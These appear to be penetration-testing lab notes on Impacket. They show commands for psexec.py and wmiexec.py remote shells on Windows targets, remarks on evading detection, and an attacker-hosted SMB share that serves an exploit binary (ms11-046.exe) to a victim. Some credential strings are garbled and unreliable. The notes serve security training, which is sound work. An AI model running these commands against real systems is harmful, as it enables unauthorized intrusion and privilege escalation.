git clone https://github.com/SecureAuthCorp/impacket.git /opt/tools/impacket cd /opt/tools/impacket/ python3 -m pip install . pip3 install -r requirements.txt #pip3 install . #python3 setup.py install # pip3 install --upgrade pip
Psexec.py is a clone of the Sysinternals psexec executable, but works slightly differently from the original. The tool creates a remote service by uploading a randomly-named executable to the
ADMIN$ share on the target host. It then registers the service via
RPC and the
Windows Service Control Manager. Once established, communication happens over a named pipe, providing an interactive remote shell as
SYSTEM on the victim host.
/opt/tools/impacket/examples/psexec.py $DOMAIN/$USER:$PASS@$IP # /opt/tools/impacket/examples/psexec.py inlanefreight.local/wley:'transporter@firstname.lastname@example.org
Wmiexec.py utilizes a semi-interactive shell where commands are executed through Windows Management Instrumentation. It does not drop any files or executables on the target host and generates fewer logs than other modules. After connecting, it runs as the local admin user we connected with (this can be less obvious to someone hunting for an intrusion than seeing SYSTEM executing many commands). This is a more stealthy approach to execution on hosts than other tools, but would still likely be caught by most modern anti-virus and EDR systems. We will use the same account as with psexec.py to access the host.
/opt/tools/impacket/examples/wmiexec.py $DOMAIN/$USER:$PASS@$IP # wmiexec.py inlanefreight.local/wley:'transporter@email@example.com
smbserver.py - Samba local server
Setup SMB Server - Kali
/opt/tools/impacket/examples/smbserver.py public . /opt/tools/impacket/examples/smbserver.py -smb2support public .
/opt/tools/impacket/examples/smbserver.py -smb2support -username admin -password password123 public . # /opt/tools/impacket/examples/smbserver.py -smb2support -username 'thm' -password 'Passw0rd!' public . # /opt/tools/impacket/examples/smbserver.py -smb2support -username 'htb-student' -password 'Academy_student_AD!' public .
//<KALI_IP>/public/ms11-046.exe //<KALI_IP>/public/accesschk.exe -uwdq "C:\Program Files\Unquoted Path Service\"